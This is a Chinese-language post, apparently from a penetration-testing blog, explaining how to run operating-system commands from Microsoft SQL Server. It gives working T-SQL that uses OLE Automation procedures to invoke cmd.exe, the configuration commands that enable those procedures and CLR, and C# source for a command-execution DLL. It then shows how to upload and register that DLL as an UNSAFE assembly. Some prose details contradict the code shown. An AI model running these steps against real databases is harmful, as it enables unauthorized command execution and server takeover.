利用COM执行命令
(需要开启Ole Automation Procedures组件)declare @luan <span>int</span>,@exec <span>int</span>,@text <span>int</span>,@str varchar(<span>8000</span>);<br><span>exec</span> sp_oacreate <span>'{72C24DD5-D70A-438B-8A42-98424B88AFB8}'</span>,@luan output;<br><span>exec</span> sp_oamethod @luan,<span>'exec'</span>,@exec output,<span>'C:\\Windows\\System32\\cmd.exe /c whoami'</span>;<br><span>exec</span> sp_oamethod @exec, <span>'StdOut'</span>, @text out;<br><span>exec</span> sp_oamethod @text, <span>'readall'</span>, @str out;<br><span>select</span> @str;<br>
没有开启Ole Automation Procedures,可以用下面的命令开启
<span>sp_configure</span> <span>'show advanced options'</span>, <span>1</span>;<br><span>GO</span><br>RECONFIGURE;<br><span>GO</span><br>sp_configure <span>'Ole Automation Procedures'</span>, <span>1</span>;<br><span>GO</span><br>RECONFIGURE;<br><span>GO</span><br>
编写语言:C#
Vs创建类库
<span>using</span> System;<br><span>using</span> System.Collections.Generic;<br><span>using</span> System.Linq;<br><span>using</span> System.Text;<br><span>using</span> System;<br><span>using</span> System.Threading.Tasks;<br><br><span>namespace</span> <span>shellexec</span><br>{<br> <span>public</span> <span>class</span> <span>exec</span><br> {<br> <span><span>public</span> <span>static</span> <span>string</span> <span>cmd</span>(<span><span>string</span> command</span>)<br> </span>{<br> System.Diagnostics.Process pro = <span>new</span> System.Diagnostics.Process();<br> pro.StartInfo.FileName = <span>"cmd.exe"</span>;<br> pro.StartInfo.UseShellExecute = <span>false</span>;<br> pro.StartInfo.RedirectStandardError = <span>true</span>; <span>//标准错误</span><br> pro.StartInfo.RedirectStandardInput = <span>true</span>; <span>//标准输入</span><br> pro.StartInfo.RedirectStandardOutput = <span>true</span>; <span>//标准输出</span><br> pro.StartInfo.CreateNoWindow = <span>true</span>; <span>//是否在新窗口开启进程</span><br> pro.Start();<br> pro.StandardInput.WriteLine(command + <span>"&&exit"</span>); <span>//命令参数写入</span><br> pro.StandardInput.AutoFlush = <span>true</span>; <span>//缓冲区自动刷新</span><br> <span>string</span> output = pro.StandardOutput.ReadToEnd(); <span>//读取执行结果</span><br> pro.WaitForExit(); <span>//等待执行完成退出</span><br> pro.Close();<br> <span>return</span> output.ToString();<br> }<br> }<br>}<br><br>
生成dll后,可以用hex的方法写到目标,或者shell上传。然后开始构造
1.目标数据库实例需要启用clr集成
<span>exec</span> sp_configure <span>'clr enabled'</span>, 1;--在SQL Server中启用CLR<br>reconfigure;<br>go<br>
2.目标数据库的可信任属性需要设为false,可以使用以下语句启用
<span>ALTER</span> <span>DATABASE</span> [<数据库名称>] <span>SET</span> TRUSTWORTHY <span>ON</span><br>
3.在数据库中注册DLL
<span>CREATE</span> <span>ASSEMBLY</span> MySqlCLR <span>FROM</span> <span>'<dll的路径>'</span> //MySqlCLR为导入dll后的变量名称<br>
4.创建函数
(根据对应函数的类型的参数构造对应的参数类型,然后RETURNS [nvarchar] (max)记得设置为返回最大如果是返回string类型的话),在直接这个dll的名称在那个命名空间、类、函数)
<span>CREATE</span> <span>FUNCTION</span> [dbo].[cmd2] <br>( <br> @cmd <span>AS</span> <span>NVARCHAR</span>(<span>max</span>)<br>) <br><span>RETURNS</span> [<span>nvarchar</span>] (<span>max</span>) <span>WITH</span> <span>EXECUTE</span> <span>AS</span> CALLER<br><span>AS</span> <br><span>EXTERNAL</span> <span>NAME</span> [MySqlCLR].[shellexec.exec].cmd //shellexec为命名空间,exec为类名,cmd为函数名<br><span>GO</span><br>
5.程序集的权限级别必须设为 external access,否则在部署的时候会报错
<span>ALTER</span> <span>ASSEMBLY</span> [MySqlCLR]<br><span>WITH</span> PERMISSION_SET = <span>UNSAFE</span><br>
6.调用存储过程和函数方法
select [<span>dbo</span>].[<span>cmd2</span>](<span>'whoami'</span>)<br>
参考链接:
https://blog.csdn.net/catchme_439/article/details/78411009
https://zhuanlan.zhihu.com/p/33322584?from_voters_page=true
